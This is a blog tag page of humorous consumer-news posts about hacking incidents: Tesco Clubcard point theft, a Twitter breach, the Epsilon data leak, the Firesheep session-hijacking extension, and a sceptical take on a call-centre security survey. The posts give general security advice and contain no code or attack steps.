Posts Tagged ‘hacking’

It’s pretty creepy that Tesco use the Clubcard scheme to send targeted mail about Tena Lady and vodka (or this that just me?). But even creepier, now it seems your points might not be safe.

Today it was revealed that internet scamps have been hacking into Clubcard accounts to steal points off unsuspecting customers. Tesco and the police are investigating, and appealing for those who have been affected to get in touch.

According to Tesco the number of customers affected is ‘significantly less than 100.’ But those who’ve been hacked have been reporting login issues, and some Clubcard members have been informed that the vouchers were spent miles away from their home. Some poor sap on the Tesco site complained:
‘We logged on this month to find that £160 of vouchers that we were hoping to use at Christmas had been stolen from our Clubcard account. It had been spent in two stores in London, miles away from where we live.’

So if you see anyone in the er… London branch of Tesco wearing a balaclava and pushing a trolley full of someone else’s Christmas presents, give them what’s known in the trade as ‘an unexpected item in the bagging area’.

Oops – if you’re a Twitter user, there’s a chance that online baddies might have hacked in to your account and nicked some of your info.

About 250,000 users of the wildly-popular social media phenomenon have been hacked in a move that has been described as ‘not the work of amateurs’ by the company’s info security lord, Bob Lord.

The plot thickens – Twitter has said that they will email anyone who they suspect has been hacked, but this in itself will give rise to a rash of phishing attempts, as other hackers try to disguise their fiendish works as Twitter emails, leading to further hackery and evil-doings.

In short, don’t click on a link in an email that asks you to change your password. Instead, head straight for the site in question yourself and do it that way. Clicking on links in emails = bad times.

Yesterday we reported on the massive security breach at Epsilon, an online marketing firm, that affected some of the world’s biggest brands. But while the Texas-based company and the majority of the businesses are US-based, we’re hearing about a lot of avid Bitterwallet readers in the UK who have been affected.

Readers Kiara and Jade received warnings from Benefit Cosmetics, while Chris had received an email from TiVo that stated his email address had been exposed – even though Chris has never had any contact with or passed his details onto TiVo.

This morning, more companies have admitted Epsilon has lost their customer data, which is predominantly used for email newsletters and marketing; reader Chris avidly informed us of another email he received today from Best Buy, saying “files containing the email addresses of some Best Buy customers were accessed without authorization.”

Meanwhile readers Simon, Damien and Katy have all heard from Hilton Worldwide – “Epsilon has stressed that the only information accessed was names and e-mail addresses.”

As we mentioned yesterday, it’s hardly the stuff of apocalypses, more a guarantee that your details will be folded into some überdatabase and result in phishing attempts and offers to make her “gush like a blowhole all night long” until the end of time.

WARNING! All unsecured HTTP sites (including Facebook, Twitter, Foursquare and loads of very popular web destinations) have an underbelly softer than a mouse’s ear.

A developer called Eric Butler has decided to expose it for us all to see with his new Firefox extension, Firesheep, which lets you essentially eavesdrop on any open Wi-Fi network and capture users’ cookies.

Butler explains: “As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed.”

All you have to do is double click in the window which shows a person’s details and you’ll be able to log into that user’s site with their credentials.

So basically, anytime you use an open Wi-Fi connection, there’s now a good good chance that someone can access some of your most private, personal information and correspondence (start deleting your dirty direct messages now, eh?).

Basically, if a site is not secure, it keeps track of you through a cookie which contains identifying information for that website. Firesheep grabs these cookies and lets you pretend to be them. Astonishing stuff really.

If you’re not particularly worried about someone mucking around with your social networking profiles, then maybe you’ll be more concerned about the fact that this extension can also work with things like Amazon and WordPress. And that’s just through the default setting. If you’re savvy enough, you can write your own plugins and start hacking away at other stuff.

Butler says that he created this unsavoury tool to expose the lack of security on the web.

“Websites have a responsibility to protect the people who depend on their services. They’ve been ignoring this responsibility for too long, and it’s time for everyone to demand a more secure web. My hope is that Firesheep will help the users win,” Butler says.

It seems there’s not much you can do to prevent sessions getting hijacked, so as a user, the lesson here is that you shouldn’t log-in on an open network (unless you use VPN) as it leaves you wide open for someone to start delving into your private data.

According to a new survey by a company that has plenty to gain from the results, businesses are potentially exposing their customers to data theft by failing to erase recorded calls containing personal data and credit card information.

The survey by Veritape, which sells business software for recording phone calls in call centres – no interest at all in the results of their own survey, then – claims just three per cent of UK call centres comply with industry guidelines; the other 97 per cent store unedited customer calls. Less than four in ten businesses were aware of the Payment Card Industry rules which state card details must not be stored once transactions have been completed.

Viritape say it is “relatively straightforward” for a hacker to data mine these call recordings, and that “successful hacking incidents are rising steadily.” Everyone else who has blindly reproduced their findings seems to agree with the assessment, even though it appears journalists have simply cut and paste the details. The Times, for example:

Oh. Right. The thing is, we’re struggling to find any notable examples of fraud committed in this way. Despite the claimed ease, we can’t find a single incident of recorded phone conversations been stolen remotely and the data within used to commit credit card fraud. The Telegraph publishes some figures, but these are generic figures that refer to “phone, internet and mail order fraud” rather than capturing data through the very specific method that the entire story rests on. We’re not saying it hasn’t happened, we’re just unsure why an increasingly popular and “relatively straightforward” method of stealing credit card information hasn’t led to several high profile news stories, besides those that appeared today repeating the claims of a survey conducted by a company with a vested interest in the outcome.

Of course it’s not acceptable for call centres to store personal data on the sly, but it’s somewhat difficult to ascertain whether this scaremongering PR exercise highlights any genuine threat to consumers. In the same way that writing your online banking passwords on a slip of paper in Urdu and hiding it under the floorboards potentially puts your finances at risk from burglars, there is a possibility your recorded phonecalls could be hacked – but the problem appears far less significant than anyone, either the company looking to line their pockets or the newspapers desperate to fill their pages, would have you believe.

UPDATED 17/10: The Times has amended their description of Veritape for the print version of the story:

Thereby proving they didn’t simply shamelessly cut and paste from the original press release. The new version of the story also now attempts to justify Veritape’s claims:

“Veritape says that “data mining” of audio recordings — when criminals hack into the recordings — is relatively straightforward and has occurred in at least one UK bank in the past 12 months.”

So despite the inference by Veritape that this is an increasingly common problem, they have one example of it occurring at one company in the whole country, in a year. That’s one incident, despite thousands of companies using call centres to deal with millions of customer transactions every day – and there’s still no detail of which company it was, when it occurred, how many customers were affected or indeed any other facts concerning the matter.

If your aim is to panic the public (to quote Veritape in the press, “this practice ought to send a shiver up the spine of card providers”) it’s pretty important to have a case study to prove your point, whether you’re the company pushing the research of the media reproducing it as news.